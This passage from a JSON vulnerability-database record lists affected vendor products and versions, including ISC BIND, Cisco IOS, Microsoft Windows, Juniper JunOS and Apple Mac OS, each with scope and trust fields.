            "vendor": "rpath",
            "version": "1"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4.1"
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.6"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.4"
          },
          {
            "_id": null,
            "model": "matsumoto ruby",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5"
          },
          {
            "_id": null,
            "model": "windows xp media center edition sp3",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.3"
          },
          {
            "_id": null,
            "model": "windows xp tablet pc edition sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.14"
          },
          {
            "_id": null,
            "model": "ios 12.2t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "matsumoto ruby",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.4"
          },
          {
            "_id": null,
            "model": "ios 12.2xg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mpe/ix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "rt200i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.3xh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server enterprise edition sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.6"
          },
          {
            "_id": null,
            "model": "bind p1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.2"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "bind 9.4.3b2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "_id": null,
            "model": "windows server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "_id": null,
            "model": "bind p5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.2"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "coat systems director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "0"
          },
          {
            "_id": null,
            "model": "windows server standard edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows xp media center edition",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "linux enterprise sdk sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "networks junose",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "windows server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 88",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "rt58i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "_id": null,
            "model": "networks junose",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.0.02"
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1"
          },
          {
            "_id": null,
            "model": "networks adonis",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecat",
            "version": "5.0.5"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.3"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.2"
          },
          {
            "_id": null,
            "model": "networks optical ambb",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.2"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.9"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4"
          },
          {
            "_id": null,
            "model": "bind -p2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.2"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.4"
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "coat systems ishaper",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "0"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5.14"
          },
          {
            "_id": null,
            "model": "networks junose p0-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "nios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "infoblox",
            "version": "4"
          },
          {
            "_id": null,
            "model": "ios 12.3yd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows datacenter server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "financials server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "navision",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.6.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "bind rc2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.3"
          },
          {
            "_id": null,
            "model": "networks optical rmbb",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.4.7"
          },
          {
            "_id": null,
            "model": "windows advanced server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "ios 12.3ym",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.1.2"
          },
          {
            "_id": null,
            "model": "ios 12.4mr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bind 9.5.0a3",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "messaging application server mm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "networks optical application platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "-par",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pdnsd",
            "version": "1.2.3"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.9"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "solaris 8 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.3.5"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.3"
          },
          {
            "_id": null,
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.17.6"
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "networks screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "3-dns",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.6.3"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "windows professional sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "networks srg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "appliance platform linux service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5"
          },
          {
            "_id": null,
            "model": "networks optical fmbb",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.4xn",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "bind 9.3.5-p2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ea",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "tru64 unix b-3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "ios 12.3xf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bind 9.5.0b2",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.4xv"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "netware sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "ios 12.3yt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "cns network registrar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.1.3"
          },
          {
            "_id": null,
            "model": "matsumoto ruby",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.9"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.6"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.0.02"
          },
          {
            "_id": null,
            "model": "windows xp home",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1db",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server web edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "_id": null,
            "model": "windows professional sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "rt107e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "windows server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.3.3"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.11",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "matsumoto ruby",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.2"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.3.3"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.1"
          },
          {
            "_id": null,
            "model": "windows advanced server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.4"
          },
          {
            "_id": null,
            "model": "bind a2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.1"
          },
          {
            "_id": null,
            "model": "gnu/*/linux 2.0-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "openwall",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "3-dns",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.6.2"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.1"
          },
          {
            "_id": null,
            "model": "network registar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.1"
          },
          {
            "_id": null,
            "model": "windows server itanium",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20030"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "wanjet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "rtx1500",
            "scope": null,
            "trust": 0.3,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "srt100",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "ios 12.1ex",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "netscaler build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "8.047.8"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "matsumoto ruby",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.7"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ios 12.3yi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vitalqip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "lucent",
            "version": "7.x"
          },
          {
            "_id": null,
            "model": "ios 12.3xq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt103i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "windows server itanium sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "dns library pydns",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "python",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "windows xp home sp3",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "vitalqip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "lucent",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.4.6"
          },
          {
            "_id": null,
            "model": "ios 12.0xr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks multimedia comm mcs5100",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "bind a3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6.4"
          },
          {
            "_id": null,
            "model": "ios 12.4t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.13"
          },
          {
            "_id": null,
            "model": "ios 12.2yn",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks junos 8.5.r1",
            "scope": null,
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3.9"
          },
          {
            "_id": null,
            "model": "ios 12.2bw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.0.0.01"
          },
          {
            "_id": null,
            "model": "3.1 rc3",
            "scope": null,
            "trust": 0.3,
            "vendor": "netbsd",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server datacenter edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "ipod touch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 01",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bind rc2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 92",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "rt80i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "2"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "ios 12.3xd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3va",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.1"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.23",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "linux enterprise desktop sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5.6"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.1.0.01"
          },
          {
            "_id": null,
            "model": "rtx2000",
            "scope": null,
            "trust": 0.3,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "networks bcm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "200"
          },
          {
            "_id": null,
            "model": "ios 12.2yv",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.10"
          },
          {
            "_id": null,
            "model": "-current",
            "scope": null,
            "trust": 0.3,
            "vendor": "openbsd",
            "version": null
          },
          {
            "_id": null,
            "model": "network registar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "-par",
